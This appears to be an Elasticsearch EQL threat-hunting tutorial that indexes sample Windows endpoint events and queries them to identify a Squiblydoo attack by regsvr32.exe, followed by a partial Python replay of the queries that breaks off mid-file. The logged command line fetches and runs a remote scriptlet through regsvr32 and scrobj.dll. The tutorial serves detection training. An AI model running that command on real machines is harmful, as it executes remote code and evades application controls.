{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ncrypt.dll" , "name" : "ncrypt.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ntasn1.dll" , "name" : "ntasn1.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing" , "value" : "Software Publishing" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cryptnet.dll" , "name" : "cryptnet.dll" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList" , "value" : "LanguageList" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573238869984 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\ncryptsslp.dll" , "name" : "ncryptsslp.dll" } , "@timestamp" : 131883573239170000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\clbcatq.dll" , "name" : "clbcatq.dll" } , "@timestamp" : 131883573240110000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wldp.dll" , "name" : "wldp.dll" } , "@timestamp" : 131883573240110000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing" , "value" : "Software Publishing" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240110000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\userenv.dll" , "name" : "userenv.dll" } , "@timestamp" : 131883573240270000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\version.dll" , "name" : "version.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\shell32.dll" , "name" : "shell32.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cfgmgr32.dll" , "name" : "cfgmgr32.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\mpr.dll" , "name" : "mpr.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\sxs.dll" , "name" : "sxs.dll" } , "@timestamp" : 131883573240580000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\gpapi.dll" , "name" : "gpapi.dll" } , "@timestamp" : 131883573240580000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" , "name" : "OneCoreUAPCommonProxyStub.dll" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace" , "value" : "NameSpace" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace" , "value" : "NameSpace" , "key" : "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders" , "value" : "DelegateFolders" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240740000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\jscript.dll" , "name" : "jscript.dll" } , "@timestamp" : 131883573240270000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\amsi.dll" , "name" : "amsi.dll" } , "@timestamp" : 131883573240270000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SyncRootManager" , "value" : "SyncRootManager" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573240890000 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\edputil.dll" , "name" : "edputil.dll" } , "@timestamp" : 131883573240890000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll" , "name" : "Windows.StateRepositoryPS.dll" } , "@timestamp" : 131883573240890000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpOAV.dll" , "name" : "MpOAV.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\cldapi.dll" , "name" : "cldapi.dll" } , "@timestamp" : 131883573241050000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\WinTypes.dll" , "name" : "WinTypes.dll" } , "@timestamp" : 131883573241050000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\wshom.ocx" , "name" : "wshom.ocx" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "registry" : { "path" : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data\\418A073AA3BC3475" , "value" : "418A073AA3BC3475" , "key" : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Notifications\\Data" } , "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\WINDOWS\\system32\\regsvr32.exe" } , "@timestamp" : 131883573241200016 , "event" : { "category" : "registry" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\Windows\\System32\\scrrun.dll" , "name" : "scrrun.dll" } , "@timestamp" : 131883573240430000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "dll" : { "path" : "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.1810.5-0\\MpClient.dll" , "name" : "MpClient.dll" } , "@timestamp" : 131883573240580000 , "event" : { "category" : "library" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "@timestamp" : 131883573241369984 , "event" : { "category" : "process" , "type" : "termination" } }
{ "index" : { } }
{ "process" : { "name" : "regsvr32.exe" , "pid" : 2012 , "entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" , "executable" : "C:\\Windows\\System32\\regsvr32.exe" } , "destination" : { "address" : "151.101.48.133" , "port" : "443" } , "source" : { "address" : "192.168.162.134" , "port" : "50505" } , "network" : { "direction" : "outbound" , "protocol" : "tcp" } , "@timestamp" : 131883573238680000 , "event" : { "category" : "network" } , "user" : { "full_name" : "bob" , "domain" : "ART-DESKTOP" , "id" : "ART-DESKTOP\\bob" } }
# Request
GET /_cat/indices/my-eql-index?v=true&h=health,status,index,docs.count
# Response
health status index        docs.count
yellow open   my-eql-index        150
(2) Get the count of regsvr32 events
Get the number of events associated with the regsvr32.exe process.
?filter_path=-hits.events excludes the hits.events property from the response; this search is only meant to obtain the event count, not the list of matching events. query: matches any event whose process name is regsvr32.exe. size: return at most 200 matching events; the actual query result is 143.
# Request
GET my-eql-index/_eql/search?filter_path=-hits.events
{
"query": """
any where process.name == "regsvr32.exe"
""",
"size": 200
}
# Response
{
"is_partial" : false ,
"is_running" : false ,
"took" : 4 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 143 ,
"relation" : "eq"
}
}
}
(3) Check the command-line arguments
The regsvr32.exe process is associated with 143 events. But how was regsvr32.exe invoked in the first place, and by whom? regsvr32.exe is a command-line utility, so narrow the results to process events that carry a command line. The query matches an event whose event.type is creation, indicating the start of the regsvr32.exe process. Judging by the event's process.command_line value, regsvr32.exe used scrobj.dll to register the scriptlet RegSvr32.sct, which matches the behaviour of a Squiblydoo attack.
# Add a filter condition to the query
GET my-eql-index/_eql/search
{
"query": """
process where process.name == "regsvr32.exe" and process.command_line.keyword != null
"""
}
# Response
{
"is_partial" : false ,
"is_running" : false ,
"took" : 1 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "my-eql-index" ,
"_id" : "ttYDc5QBefqFnzZaY1qF" ,
"_source" : {
"process" : {
"parent" : {
"name" : "cmd.exe" ,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010AA385401}" ,
"executable" : """C:\Windows\System32\cmd.exe"""
} ,
"name" : "regsvr32.exe" ,
"pid" : 2012 ,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" ,
"command_line" : "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ,
"executable" : """C:\Windows\System32\regsvr32.exe""" ,
"ppid" : 2652
} ,
"logon_id" : 217055 ,
"@timestamp" : 131883573237130000 ,
"event" : {
"category" : "process" ,
"type" : "creation"
} ,
"user" : {
"full_name" : "bob" ,
"domain" : "ART-DESKTOP" ,
"id" : """ART-DESKTOP\bob"""
}
}
}
]
}
}
(4) Check for the malicious script load
Check whether regsvr32.exe subsequently loads the scrobj.dll library.
# Add a filter condition to the query
GET my-eql-index/_eql/search
{
"query": """
library where process.name == "regsvr32.exe" and dll.name == "scrobj.dll"
"""
}
# Response
{
"is_partial" : false ,
"is_running" : false ,
"took" : 0 ,
"timed_out" : false ,
"hits" : {
"total" : {
"value" : 1 ,
"relation" : "eq"
} ,
"events" : [
{
"_index" : "my-eql-index" ,
"_id" : "1tYDc5QBefqFnzZaY1qF" ,
"_source" : {
"process" : {
"name" : "regsvr32.exe" ,
"pid" : 2012 ,
"entity_id" : "{42FC7E13-CBCB-5C05-0000-0010A0395401}" ,
"executable" : """C:\Windows\System32\regsvr32.exe"""
} ,
"dll" : {
"path" : """C:\Windows\System32\scrobj.dll""" ,
"name" : "scrobj.dll"
} ,
"@timestamp" : 131883573237450020 ,
"event" : {
"category" : "library"
}
}
}
]
}
}
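The hunt in steps (2) to (4) can be replayed offline. The block below is an added example, not code from the original page or from Elastic: it re-implements the three EQL queries in plain Python over a constructed batch of events laid out like the page's sample data (process.name, process.command_line, dll.name, event.category, process.entity_id), and goes one step further by joining the process-creation and library-load matches by process.entity_id, which is what an EQL `sequence by process.entity_id` would express. Entity ids and the scriptlet URL are placeholders.

```python
"""Offline replay of the regsvr32 hunt (steps 2-4) over constructed events."""
import json
import re

# Constructed sample events, abridged from the page's bulk request. The
# entity ids and the /i: URL are placeholders, not values from the page.
SAMPLE_NDJSON = r"""
{"process":{"parent":{"name":"cmd.exe","entity_id":"{P-CMD-1}"},"name":"regsvr32.exe","pid":2012,"entity_id":"{P-REG-1}","command_line":"regsvr32.exe /s /u /i:https://example.invalid/RegSvr32.sct scrobj.dll","executable":"C:\\Windows\\System32\\regsvr32.exe"},"@timestamp":131883573237130000,"event":{"category":"process","type":"creation"}}
{"process":{"name":"regsvr32.exe","pid":2012,"entity_id":"{P-REG-1}"},"dll":{"path":"C:\\Windows\\System32\\scrobj.dll","name":"scrobj.dll"},"@timestamp":131883573237450020,"event":{"category":"library"}}
{"process":{"name":"regsvr32.exe","pid":2012,"entity_id":"{P-REG-1}"},"dll":{"path":"C:\\Windows\\System32\\jscript.dll","name":"jscript.dll"},"@timestamp":131883573240270000,"event":{"category":"library"}}
{"process":{"name":"regsvr32.exe","pid":2012,"entity_id":"{P-REG-1}"},"destination":{"address":"151.101.48.133","port":"443"},"network":{"direction":"outbound","protocol":"tcp"},"@timestamp":131883573238680000,"event":{"category":"network"}}
{"process":{"name":"regsvr32.exe","pid":2012,"entity_id":"{P-REG-1}"},"@timestamp":131883573241369984,"event":{"category":"process","type":"termination"}}
{"process":{"name":"regsvr32.exe","pid":3100,"entity_id":"{P-REG-2}","command_line":"regsvr32.exe /s C:\\Program Files\\Vendor\\plugin.dll"},"@timestamp":131883573250000000,"event":{"category":"process","type":"creation"}}
{"process":{"name":"regsvr32.exe","pid":3100,"entity_id":"{P-REG-2}"},"dll":{"path":"C:\\Program Files\\Vendor\\plugin.dll","name":"plugin.dll"},"@timestamp":131883573250100000,"event":{"category":"library"}}
"""


def parse_events(ndjson: str) -> list:
    """Parse newline-delimited JSON, skipping blank lines."""
    return [json.loads(line) for line in ndjson.splitlines() if line.strip()]


def field(event: dict, dotted: str):
    """Resolve a dotted path such as 'process.command_line'; None if absent."""
    cur = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


# Step (2): any where process.name == "regsvr32.exe"
def count_process_events(events, name="regsvr32.exe") -> int:
    return sum(1 for e in events if field(e, "process.name") == name)


# Step (3): process where process.name == "regsvr32.exe"
#           and process.command_line.keyword != null
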